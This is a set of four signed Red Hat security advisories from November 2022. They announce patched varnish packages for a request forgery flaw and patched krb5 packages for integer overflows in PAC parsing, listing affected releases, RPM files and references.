Red Hat Security Advisory 2022-8647-01 - Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: varnish:6 security update  
Advisory ID:       RHSA-2022:8647-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8647  
Issue date:        2022-11-28  
CVE Names:         CVE-2022-45060   
=====================================================================

1. Summary:

An update for the varnish:6 module is now available for Red Hat Enterprise  
Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Varnish Cache is a high-performance HTTP accelerator. It stores web pages  
in memory so web servers don't have to create the same web page over and  
over again, giving the website a significant speed up.

Security Fix(es):

* varnish: Request Forgery Vulnerability (CVE-2022-45060)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2141844 - CVE-2022-45060 varnish: Request Forgery Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
varnish-6.0.2-2.module+el8.1.0+17243+35307414.2.src.rpm  
varnish-modules-0.15.0-4.module+el8+2481+4078e9d2.src.rpm

aarch64:  
varnish-6.0.2-2.module+el8.1.0+17243+35307414.2.aarch64.rpm  
varnish-devel-6.0.2-2.module+el8.1.0+17243+35307414.2.aarch64.rpm  
varnish-docs-6.0.2-2.module+el8.1.0+17243+35307414.2.aarch64.rpm  
varnish-modules-0.15.0-4.module+el8+2481+4078e9d2.aarch64.rpm  
varnish-modules-debuginfo-0.15.0-4.module+el8+2481+4078e9d2.aarch64.rpm  
varnish-modules-debugsource-0.15.0-4.module+el8+2481+4078e9d2.aarch64.rpm

ppc64le:  
varnish-6.0.2-2.module+el8.1.0+17243+35307414.2.ppc64le.rpm  
varnish-devel-6.0.2-2.module+el8.1.0+17243+35307414.2.ppc64le.rpm  
varnish-docs-6.0.2-2.module+el8.1.0+17243+35307414.2.ppc64le.rpm  
varnish-modules-0.15.0-4.module+el8+2481+4078e9d2.ppc64le.rpm  
varnish-modules-debuginfo-0.15.0-4.module+el8+2481+4078e9d2.ppc64le.rpm  
varnish-modules-debugsource-0.15.0-4.module+el8+2481+4078e9d2.ppc64le.rpm

s390x:  
varnish-6.0.2-2.module+el8.1.0+17243+35307414.2.s390x.rpm  
varnish-devel-6.0.2-2.module+el8.1.0+17243+35307414.2.s390x.rpm  
varnish-docs-6.0.2-2.module+el8.1.0+17243+35307414.2.s390x.rpm  
varnish-modules-0.15.0-4.module+el8+2481+4078e9d2.s390x.rpm  
varnish-modules-debuginfo-0.15.0-4.module+el8+2481+4078e9d2.s390x.rpm  
varnish-modules-debugsource-0.15.0-4.module+el8+2481+4078e9d2.s390x.rpm

x86_64:  
varnish-6.0.2-2.module+el8.1.0+17243+35307414.2.x86_64.rpm  
varnish-devel-6.0.2-2.module+el8.1.0+17243+35307414.2.x86_64.rpm  
varnish-docs-6.0.2-2.module+el8.1.0+17243+35307414.2.x86_64.rpm  
varnish-modules-0.15.0-4.module+el8+2481+4078e9d2.x86_64.rpm  
varnish-modules-debuginfo-0.15.0-4.module+el8+2481+4078e9d2.x86_64.rpm  
varnish-modules-debugsource-0.15.0-4.module+el8+2481+4078e9d2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45060  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4SvzdzjgjWX9erEAQhY3Q//ch6h95QRgAa6EQgMF18QbJAVViVHm2QB  
lrzOZKlJdZnoZDt/Gu61M85UOqM2qlac5I7SaZuJusbx6YgiyLhs+EogKZoO46vB  
vOneM1UDHIUwPSd4BoiWlCspXAMlILOZ878q4gSkSh0zIvhEvBZXEDMMtFCSZRuy  
b1QFMCEMv5VX4kpAvD3cf/F59NsWNagHpFpbTi+49On2vRNoU3LfxonBFcQMwJNJ  
lh3A0hRcicx1rj9/aNHkuj/5vf3kgVxiQzYvnM8ebwFqFMtXHn/0S2CKInC2UbFA  
qo78qjI0diP/zr2XKez/jAqdh5rVpePwj5DPFxJ3F9eyWbpSBFCbCYpf7RuwLYtN  
Rkew18oVb573DQThKZUgSVwtvxB5iYuFN+z2MMfK3zzOC2GGXG5gTCSvpr5iZ+aX  
QG/F/xzreHX979etAAL3VKjCJbC4VXDFYa2kBLNfTb8rbHk+6lAJlBKSK3L9tI95  
xIwpCx2H8yuT1rJiyihgyc5JNjQ+Z3YdK3rvFFa6ZNeptKxC664IXarTiXEwfCFs  
4jb2q65mxcNDTAkqx4+42H0q5OlGyFJ8W9+WUVCwtHoGGq2JStuHqcX05X1XIKbh  
1PCVql2UVCe8LkPgyE2poCFCWkLCc6LyKG8WYGT1vN7l3MQF7MB6xeeW/vC/cwAY  
WnwZH6BypQ4=  
=tUnR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8647-01

Red Hat Security Advisory 2022-8645-01 - Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: varnish:6 security update  
Advisory ID:       RHSA-2022:8645-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8645  
Issue date:        2022-11-28  
CVE Names:         CVE-2022-45060   
=====================================================================

1. Summary:

An update for the varnish:6 module is now available for Red Hat Enterprise  
Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Varnish Cache is a high-performance HTTP accelerator. It stores web pages  
in memory so web servers don't have to create the same web page over and  
over again, giving the website a significant speed up.

Security Fix(es):

* varnish: Request Forgery Vulnerability (CVE-2022-45060)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2141844 - CVE-2022-45060 varnish: Request Forgery Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
varnish-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.src.rpm  
varnish-modules-0.15.0-5.module+el8.3.0+6843+b3b42fcc.src.rpm

aarch64:  
varnish-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.aarch64.rpm  
varnish-devel-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.aarch64.rpm  
varnish-docs-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.aarch64.rpm  
varnish-modules-0.15.0-5.module+el8.3.0+6843+b3b42fcc.aarch64.rpm  
varnish-modules-debuginfo-0.15.0-5.module+el8.3.0+6843+b3b42fcc.aarch64.rpm  
varnish-modules-debugsource-0.15.0-5.module+el8.3.0+6843+b3b42fcc.aarch64.rpm

ppc64le:  
varnish-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.ppc64le.rpm  
varnish-devel-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.ppc64le.rpm  
varnish-docs-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.ppc64le.rpm  
varnish-modules-0.15.0-5.module+el8.3.0+6843+b3b42fcc.ppc64le.rpm  
varnish-modules-debuginfo-0.15.0-5.module+el8.3.0+6843+b3b42fcc.ppc64le.rpm  
varnish-modules-debugsource-0.15.0-5.module+el8.3.0+6843+b3b42fcc.ppc64le.rpm

s390x:  
varnish-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.s390x.rpm  
varnish-devel-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.s390x.rpm  
varnish-docs-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.s390x.rpm  
varnish-modules-0.15.0-5.module+el8.3.0+6843+b3b42fcc.s390x.rpm  
varnish-modules-debuginfo-0.15.0-5.module+el8.3.0+6843+b3b42fcc.s390x.rpm  
varnish-modules-debugsource-0.15.0-5.module+el8.3.0+6843+b3b42fcc.s390x.rpm

x86_64:  
varnish-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.x86_64.rpm  
varnish-devel-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.x86_64.rpm  
varnish-docs-6.0.6-2.module+el8.4.0+17241+96fc0d9c.3.x86_64.rpm  
varnish-modules-0.15.0-5.module+el8.3.0+6843+b3b42fcc.x86_64.rpm  
varnish-modules-debuginfo-0.15.0-5.module+el8.3.0+6843+b3b42fcc.x86_64.rpm  
varnish-modules-debugsource-0.15.0-5.module+el8.3.0+6843+b3b42fcc.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45060  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4SvytzjgjWX9erEAQiQkRAApoS5j/qIWs7ZB4/jwpFTkMVCMQXWrnUo  
rxg6jD1KbnC6T9oLdls3p9az7AJ4WW//xqlVGiKSZxX2AnS9vfrr80q+ysr3cRqo  
6GXoSjtN7iIeU8Zg6OMIQR1tQ3R5dwVnITdsNJ3QU0JnKCxaxCptZRcdnvMmb/b7  
QjAyAAgzGnvIhmyzgpH4md83jw84n7IgtivKVx0wm55n8ojizjuRvhlZtQC0vcbp  
zUv5fhuHtniFmV0pgQOwkU14t3aGDXYbK680+02J3PJ4M6dPNy4nNaVzIqFZBgzY  
GSPkwmKM3IfnABnFNlvnhrqlrhji4LpNd7kbP3IkN7By1XOwdeA8GPGnvijkml+U  
GUo1VFTF59IopX3CEYWzZOUi85wRT8DELTD3agGpqCqVlL2qOpo/gmFaNtoZ6s+o  
CoMTDr3aKBw7Qr3qwGBO5YZAZewQt0rmmuJNqOD827hMNG3p/+TUoTLEVSkedkTn  
v2da/3ukXVHugdarTFrmq2AP1CTVsp+bqTAXqk0LH2y7LTjFh2En7tKFvhc7VlYj  
Emf0bzUlej7pqGP/jdQ0+9/LePfqFAmwRQ/5ziLqJtBrktr/oZk29JMCI5edJ1jZ  
cIMOlbWokpMI0cKQJVh0m/lM2gKfDfQ+hVCfvyQXztPSuF1wByjINsr7kwBwwtiI  
AJuvuB2gA4I=  
=5vN2  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8645-01

Red Hat Security Advisory 2022-8641-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: krb5 security update  
Advisory ID:       RHSA-2022:8641-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8641  
Issue date:        2022-11-28  
CVE Names:         CVE-2022-42898   
=====================================================================

1. Summary:

An update for krb5 is now available for Red Hat Enterprise Linux 8.1 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Kerberos is a network authentication system, which can improve the security  
of your network by eliminating the insecure practice of sending passwords  
over the network in unencrypted form. It allows clients and servers to  
authenticate to each other with the help of a trusted third party, the  
Kerberos key distribution center (KDC).

Security Fix(es):

* krb5: integer overflow vulnerabilities in PAC parsing (CVE-2022-42898)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, running Kerberos services (krb5kdc,  
kadmin, and kprop) will be restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2140960 - CVE-2022-42898 krb5: integer overflow vulnerabilities in PAC parsing

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
krb5-1.17-10.el8_1.src.rpm

aarch64:  
krb5-debuginfo-1.17-10.el8_1.aarch64.rpm  
krb5-debugsource-1.17-10.el8_1.aarch64.rpm  
krb5-devel-1.17-10.el8_1.aarch64.rpm  
krb5-devel-debuginfo-1.17-10.el8_1.aarch64.rpm  
krb5-libs-1.17-10.el8_1.aarch64.rpm  
krb5-libs-debuginfo-1.17-10.el8_1.aarch64.rpm  
krb5-pkinit-1.17-10.el8_1.aarch64.rpm  
krb5-pkinit-debuginfo-1.17-10.el8_1.aarch64.rpm  
krb5-server-1.17-10.el8_1.aarch64.rpm  
krb5-server-debuginfo-1.17-10.el8_1.aarch64.rpm  
krb5-server-ldap-1.17-10.el8_1.aarch64.rpm  
krb5-server-ldap-debuginfo-1.17-10.el8_1.aarch64.rpm  
krb5-workstation-1.17-10.el8_1.aarch64.rpm  
krb5-workstation-debuginfo-1.17-10.el8_1.aarch64.rpm  
libkadm5-1.17-10.el8_1.aarch64.rpm  
libkadm5-debuginfo-1.17-10.el8_1.aarch64.rpm

ppc64le:  
krb5-debuginfo-1.17-10.el8_1.ppc64le.rpm  
krb5-debugsource-1.17-10.el8_1.ppc64le.rpm  
krb5-devel-1.17-10.el8_1.ppc64le.rpm  
krb5-devel-debuginfo-1.17-10.el8_1.ppc64le.rpm  
krb5-libs-1.17-10.el8_1.ppc64le.rpm  
krb5-libs-debuginfo-1.17-10.el8_1.ppc64le.rpm  
krb5-pkinit-1.17-10.el8_1.ppc64le.rpm  
krb5-pkinit-debuginfo-1.17-10.el8_1.ppc64le.rpm  
krb5-server-1.17-10.el8_1.ppc64le.rpm  
krb5-server-debuginfo-1.17-10.el8_1.ppc64le.rpm  
krb5-server-ldap-1.17-10.el8_1.ppc64le.rpm  
krb5-server-ldap-debuginfo-1.17-10.el8_1.ppc64le.rpm  
krb5-workstation-1.17-10.el8_1.ppc64le.rpm  
krb5-workstation-debuginfo-1.17-10.el8_1.ppc64le.rpm  
libkadm5-1.17-10.el8_1.ppc64le.rpm  
libkadm5-debuginfo-1.17-10.el8_1.ppc64le.rpm

s390x:  
krb5-debuginfo-1.17-10.el8_1.s390x.rpm  
krb5-debugsource-1.17-10.el8_1.s390x.rpm  
krb5-devel-1.17-10.el8_1.s390x.rpm  
krb5-devel-debuginfo-1.17-10.el8_1.s390x.rpm  
krb5-libs-1.17-10.el8_1.s390x.rpm  
krb5-libs-debuginfo-1.17-10.el8_1.s390x.rpm  
krb5-pkinit-1.17-10.el8_1.s390x.rpm  
krb5-pkinit-debuginfo-1.17-10.el8_1.s390x.rpm  
krb5-server-1.17-10.el8_1.s390x.rpm  
krb5-server-debuginfo-1.17-10.el8_1.s390x.rpm  
krb5-server-ldap-1.17-10.el8_1.s390x.rpm  
krb5-server-ldap-debuginfo-1.17-10.el8_1.s390x.rpm  
krb5-workstation-1.17-10.el8_1.s390x.rpm  
krb5-workstation-debuginfo-1.17-10.el8_1.s390x.rpm  
libkadm5-1.17-10.el8_1.s390x.rpm  
libkadm5-debuginfo-1.17-10.el8_1.s390x.rpm

x86_64:  
krb5-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-debuginfo-1.17-10.el8_1.x86_64.rpm  
krb5-debugsource-1.17-10.el8_1.i686.rpm  
krb5-debugsource-1.17-10.el8_1.x86_64.rpm  
krb5-devel-1.17-10.el8_1.i686.rpm  
krb5-devel-1.17-10.el8_1.x86_64.rpm  
krb5-devel-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-devel-debuginfo-1.17-10.el8_1.x86_64.rpm  
krb5-libs-1.17-10.el8_1.i686.rpm  
krb5-libs-1.17-10.el8_1.x86_64.rpm  
krb5-libs-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-libs-debuginfo-1.17-10.el8_1.x86_64.rpm  
krb5-pkinit-1.17-10.el8_1.i686.rpm  
krb5-pkinit-1.17-10.el8_1.x86_64.rpm  
krb5-pkinit-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-pkinit-debuginfo-1.17-10.el8_1.x86_64.rpm  
krb5-server-1.17-10.el8_1.i686.rpm  
krb5-server-1.17-10.el8_1.x86_64.rpm  
krb5-server-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-server-debuginfo-1.17-10.el8_1.x86_64.rpm  
krb5-server-ldap-1.17-10.el8_1.i686.rpm  
krb5-server-ldap-1.17-10.el8_1.x86_64.rpm  
krb5-server-ldap-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-server-ldap-debuginfo-1.17-10.el8_1.x86_64.rpm  
krb5-workstation-1.17-10.el8_1.x86_64.rpm  
krb5-workstation-debuginfo-1.17-10.el8_1.i686.rpm  
krb5-workstation-debuginfo-1.17-10.el8_1.x86_64.rpm  
libkadm5-1.17-10.el8_1.i686.rpm  
libkadm5-1.17-10.el8_1.x86_64.rpm  
libkadm5-debuginfo-1.17-10.el8_1.i686.rpm  
libkadm5-debuginfo-1.17-10.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4Svx9zjgjWX9erEAQjLsw//eVkRt19VrrNrK5/Q/RhArwc9KjaiVlg+  
36/w9YCtw1U8iWh/GLx5m1PFhB0z+tS05egNK0HLc3h1710uo/o39vdxtkcEWpgl  
vjy6Rtv13U/mIlCCvTcURlAvksrZPLX6fYhQMkXQ2iZXH4iDFUW/99l8Bj6nNHyE  
TttQqW7oQLksi/HKrFD9ZDuQom9oaUHBCBfVkrogp92GC8a0bPiPQatggpPbLR4o  
0BE6YOdFqKA5I0VnQJI2hRKNKfdbUKxjsnSrYn90J+6yHaEs7kvxMrpwiHpN+/5I  
zuSbJ72+yY86TjZmhsswkh4Zrl9fOwQkyU52f23oiZS3CsngBJbR8WiVpymSQyDq  
ZBXflIhyT/z/V223N3k63zZ8rww4BlcnK6vDQgWDS6/deY8jDV7f2rQjy+sJsXn7  
bPDwvptpKawX5Y9Z/u3X2quobuFIKbVrWB5Wrund4myZiH72Ujo6l3+y6T7K1Md6  
gxG9bj5Ix7xJLcKXQMjuxWFON4ole7rWzsJ7sOCFxSCqfDNhCRq83MaGz0/mh3u8  
qXBsA8qSmeWuNJzHa+UM9cSb/E6yhSQ64f799B5k/Ra4mqieSjJ+es29e4Wuy6TB  
1MAnKYg7RKQpuePJYQDVOHKOBaOM5cyheoxje4eFtQWIsJjIV5Mnd1uNA7/7gszA  
GLfK57yR4gk=  
=hFqf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8641-01

Red Hat Security Advisory 2022-8637-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: krb5 security update  
Advisory ID:       RHSA-2022:8637-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8637  
Issue date:        2022-11-28  
CVE Names:         CVE-2022-42898   
=====================================================================

1. Summary:

An update for krb5 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Kerberos is a network authentication system, which can improve the security  
of your network by eliminating the insecure practice of sending passwords  
over the network in unencrypted form. It allows clients and servers to  
authenticate to each other with the help of a trusted third party, the  
Kerberos key distribution center (KDC).

Security Fix(es):

* krb5: integer overflow vulnerabilities in PAC parsing (CVE-2022-42898)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, running Kerberos services (krb5kdc,  
kadmin, and kprop) will be restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2140960 - CVE-2022-42898 krb5: integer overflow vulnerabilities in PAC parsing

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
krb5-devel-1.19.1-24.el9_1.aarch64.rpm

ppc64le:  
krb5-devel-1.19.1-24.el9_1.ppc64le.rpm

s390x:  
krb5-devel-1.19.1-24.el9_1.s390x.rpm

x86_64:  
krb5-devel-1.19.1-24.el9_1.i686.rpm  
krb5-devel-1.19.1-24.el9_1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
krb5-1.19.1-24.el9_1.src.rpm

aarch64:  
krb5-debuginfo-1.19.1-24.el9_1.aarch64.rpm  
krb5-debugsource-1.19.1-24.el9_1.aarch64.rpm  
krb5-libs-1.19.1-24.el9_1.aarch64.rpm  
krb5-libs-debuginfo-1.19.1-24.el9_1.aarch64.rpm  
krb5-pkinit-1.19.1-24.el9_1.aarch64.rpm  
krb5-pkinit-debuginfo-1.19.1-24.el9_1.aarch64.rpm  
krb5-server-1.19.1-24.el9_1.aarch64.rpm  
krb5-server-debuginfo-1.19.1-24.el9_1.aarch64.rpm  
krb5-server-ldap-1.19.1-24.el9_1.aarch64.rpm  
krb5-server-ldap-debuginfo-1.19.1-24.el9_1.aarch64.rpm  
krb5-workstation-1.19.1-24.el9_1.aarch64.rpm  
krb5-workstation-debuginfo-1.19.1-24.el9_1.aarch64.rpm  
libkadm5-1.19.1-24.el9_1.aarch64.rpm  
libkadm5-debuginfo-1.19.1-24.el9_1.aarch64.rpm

ppc64le:  
krb5-debuginfo-1.19.1-24.el9_1.ppc64le.rpm  
krb5-debugsource-1.19.1-24.el9_1.ppc64le.rpm  
krb5-libs-1.19.1-24.el9_1.ppc64le.rpm  
krb5-libs-debuginfo-1.19.1-24.el9_1.ppc64le.rpm  
krb5-pkinit-1.19.1-24.el9_1.ppc64le.rpm  
krb5-pkinit-debuginfo-1.19.1-24.el9_1.ppc64le.rpm  
krb5-server-1.19.1-24.el9_1.ppc64le.rpm  
krb5-server-debuginfo-1.19.1-24.el9_1.ppc64le.rpm  
krb5-server-ldap-1.19.1-24.el9_1.ppc64le.rpm  
krb5-server-ldap-debuginfo-1.19.1-24.el9_1.ppc64le.rpm  
krb5-workstation-1.19.1-24.el9_1.ppc64le.rpm  
krb5-workstation-debuginfo-1.19.1-24.el9_1.ppc64le.rpm  
libkadm5-1.19.1-24.el9_1.ppc64le.rpm  
libkadm5-debuginfo-1.19.1-24.el9_1.ppc64le.rpm

s390x:  
krb5-debuginfo-1.19.1-24.el9_1.s390x.rpm  
krb5-debugsource-1.19.1-24.el9_1.s390x.rpm  
krb5-libs-1.19.1-24.el9_1.s390x.rpm  
krb5-libs-debuginfo-1.19.1-24.el9_1.s390x.rpm  
krb5-pkinit-1.19.1-24.el9_1.s390x.rpm  
krb5-pkinit-debuginfo-1.19.1-24.el9_1.s390x.rpm  
krb5-server-1.19.1-24.el9_1.s390x.rpm  
krb5-server-debuginfo-1.19.1-24.el9_1.s390x.rpm  
krb5-server-ldap-1.19.1-24.el9_1.s390x.rpm  
krb5-server-ldap-debuginfo-1.19.1-24.el9_1.s390x.rpm  
krb5-workstation-1.19.1-24.el9_1.s390x.rpm  
krb5-workstation-debuginfo-1.19.1-24.el9_1.s390x.rpm  
libkadm5-1.19.1-24.el9_1.s390x.rpm  
libkadm5-debuginfo-1.19.1-24.el9_1.s390x.rpm

x86_64:  
krb5-debuginfo-1.19.1-24.el9_1.i686.rpm  
krb5-debuginfo-1.19.1-24.el9_1.x86_64.rpm  
krb5-debugsource-1.19.1-24.el9_1.i686.rpm  
krb5-debugsource-1.19.1-24.el9_1.x86_64.rpm  
krb5-libs-1.19.1-24.el9_1.i686.rpm  
krb5-libs-1.19.1-24.el9_1.x86_64.rpm  
krb5-libs-debuginfo-1.19.1-24.el9_1.i686.rpm  
krb5-libs-debuginfo-1.19.1-24.el9_1.x86_64.rpm  
krb5-pkinit-1.19.1-24.el9_1.i686.rpm  
krb5-pkinit-1.19.1-24.el9_1.x86_64.rpm  
krb5-pkinit-debuginfo-1.19.1-24.el9_1.i686.rpm  
krb5-pkinit-debuginfo-1.19.1-24.el9_1.x86_64.rpm  
krb5-server-1.19.1-24.el9_1.i686.rpm  
krb5-server-1.19.1-24.el9_1.x86_64.rpm  
krb5-server-debuginfo-1.19.1-24.el9_1.i686.rpm  
krb5-server-debuginfo-1.19.1-24.el9_1.x86_64.rpm  
krb5-server-ldap-1.19.1-24.el9_1.i686.rpm  
krb5-server-ldap-1.19.1-24.el9_1.x86_64.rpm  
krb5-server-ldap-debuginfo-1.19.1-24.el9_1.i686.rpm  
krb5-server-ldap-debuginfo-1.19.1-24.el9_1.x86_64.rpm  
krb5-workstation-1.19.1-24.el9_1.x86_64.rpm  
krb5-workstation-debuginfo-1.19.1-24.el9_1.x86_64.rpm  
libkadm5-1.19.1-24.el9_1.i686.rpm  
libkadm5-1.19.1-24.el9_1.x86_64.rpm  
libkadm5-debuginfo-1.19.1-24.el9_1.i686.rpm  
libkadm5-debuginfo-1.19.1-24.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4SvxNzjgjWX9erEAQjEwg/5AS8Q3r9p3BNQbCkVLBXBfpYXhZKI0m7o  
erYPf1SAQ9M0EPvyNv97OcE2SK9VieurgQ7synX9dVUk7O9hsUx3zaAFeLUQJIzX  
ruB1czFr/2VXJyIXWCRAKSb2JmyDfJaTGW7Ndp/k+BJ/LvIiMSp8gKlpnCIVxnIF  
10ooxYBtMjBEHApSuxkIGwzgm+62zpLyoDOvW9aKVnDcZ120HkfNeYgpqRxWIaou  
MAO3R61hS304LNW08Nm+Pk/s1Y28bVZo0TpHHjy+EAcRiTF57ohQ67ba9cLmvmYk  
37UmYctDutFoXkgMNNnuybU2PYQ+XwA8DbfiXctddVXRshYEjf4rTjTdjQPpx8X2  
w+6JzCDzgB39qIUG2xFek4PSBRPlm2zoZYyELIf2AqDdyaS5CSyVbM7AtLYx897h  
f0SQ6sg3UKlK1TYlz3Oeyruh0HMrad0rDYu7w3k5ERLXJ9ETEfYDpFRKc5SrQPL9  
au5bvg4u7IEvOMbOnYrEiJ8FaVHcjXmxMiqBzJkIvqT8c0Ypcoj829BwVEYZK/HT  
ki8VCOC1IhF+9N1ZrYAVX1D4I3I3R9KGypa5zXz+6qUAji8f2LD8fmiDsrWyauP0  
GvUOq0PYKQ2R27Zlw+2Xlo8kHHU0jfvmVdNWoAQn8t5hGoayyb44amHed/dpz9DM  
uMe/Wm8ib5Q=  
=7ZDz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8637-01

